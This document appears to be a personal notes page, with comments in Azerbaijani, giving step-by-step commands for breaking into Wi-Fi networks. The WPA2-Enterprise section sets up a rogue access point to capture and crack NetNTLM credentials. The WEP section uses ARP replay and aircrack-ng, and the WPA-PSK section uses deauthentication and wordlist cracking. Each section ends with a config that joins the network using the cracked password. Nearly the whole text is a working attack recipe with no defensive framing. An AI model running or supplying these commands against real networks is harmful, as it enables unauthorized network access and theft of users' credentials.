Wireless attacks notes
WPA ENTERPRICE QIRMAQ
https://systemweakness.com/defeating-wpa2-enterprise-peap-authentication-418829b8922c
1.airmon-ng start wlan0
2.airodump-ng wlan0mon
3.airmon-ng stop wlan0mon
4.nano hostapd-wpe.conf
etc/hostapd-wpe/hostapd-wpe.conf den de istifade ede bilerik
5.mousepad /etc/hostapd-wpe/hostapd-wpe.eap_user -- bunu yoxluyuruq sonra
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLSMSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2] [2]
6.hostapd-wpe hostapd-wpe.conf -- sonra hostapd i ise saliriq v biraz gozleyenden sonra hash-i elde edirik ve ntlm hash-i yaxalayiriq
7.john --format=netntlm --wordlist=/usr/share/john/password.lst -- rules <hash_file> john --show --format=netntlm <hash_file> -- bununla hashi qiririq
8.mousepad filename.conf -- sonra confiqurasiya faylinin icine yaziriq
network={ ssid="<ESSID>"
scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP
identity="domainname\username" password="crackedpassword" phase1="peaplabel=0" phase2="auth=MSCHAPV2"
}
10.sudo wpa_supplicant -i wlan0 -c filename.conf -- ap-e qosulmaq ucun bunu basladiriq
11.dhclient -v wlan0 -- internete qosulduq !
WEP QIRMAQ
1.airmon-ng start wlan0 airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -3 -b xx:xx:xx:xx:xx: -h xx:xx:xx:xx:xx:xx wlan0mon -- arp replay hucumu edirik
4.aircrack-ng filename.cap
5.nano filename.conf
network={ ssid="<ESSID>"
key_mgmt=NONE
wep_key0=hex key without colons and double quotes
wep_tx_keyidx=0
}
6.wpa_supplicant -i wlan0 -c filename.conf -B - ap e qosulmaq
7.dhclient -v wlan0 -- internete qosulduq!
WPA-PSK QIRMAQ
1.airmon-ng start wlan0 airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX wlan0mon
4.aircrack-ng filename.cap -w /usr/share/john/password.lst -0
5.nano filename.conf
network={ ssid="<ESSID>"
scan_ssid=1
psk="crackedpassword" key_mgmt=WPA-PSK
}
6.airmon-ng stop wlan0mon wpa_supplicant -i wlan0 -c filename.conf
7.dhclient -v wlan0 -- internete qosulduq!
Last updated
Was this helpful?